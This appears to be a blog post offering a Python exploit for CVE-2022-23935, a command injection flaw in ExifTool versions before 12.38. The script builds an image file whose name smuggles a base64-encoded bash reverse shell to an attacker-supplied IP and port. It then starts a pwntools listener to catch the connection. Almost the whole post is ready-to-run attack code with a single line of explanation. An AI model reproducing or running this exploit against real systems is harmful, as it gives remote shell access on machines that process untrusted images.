CVE-2022-23935 Exploit

CVE-2022-23935 Exploit

This vulnerability causes command injection by mismanaging a $file =~ /\|$/ check in lib/Image/ExifTool.pm in ExifTool prior to 12.38.

#!/usr/bin/python3

from pwn import *
import base64
import sys

class ExploitExiftools:
def __init__(self,ip,port):
self.ip = ip
self.port = port
self.p = log.progress(“”)

def printBanner(self):
print(“””
_____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____
/ ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____|
| | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__
| | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \
| |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) | / / ___) | ___) |
\_____| \/ |______| |____| \___/|____||____| |____||____/ /_/ |____/ |____/

by 0xFTW
“””)

def generateExploit(self):
self.p.status(“Generating payload ….”)
cmd = bytes(f’/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1′,’UTF-8′)
encodedName = base64.b64encode(cmd)
image = b”/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=”
imageName = f”echo {encodedName.decode()} | base64 -d | bash |”
with open(imageName, “wb”) as img:
img.write(base64.decodebytes(image))
self.p.status(f”Payload generated and saved as ‘{imageName}'”)

def starting_listner(self):
l = listen(self.port)
conn = l.wait_for_connection()
self.p.success(“Connected!!!!”)
conn.interactive()

if __name__ == “__main__”:

if len(sys.argv) != 3:
error(f”Usage: {sys.argv[0]} IP PORT”)

if len(sys.argv) == 3:
exploit = ExploitExiftools(sys.argv[1],sys.argv[2])

exploit.printBanner()
exploit.generateExploit()
exploit.starting_listner()

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir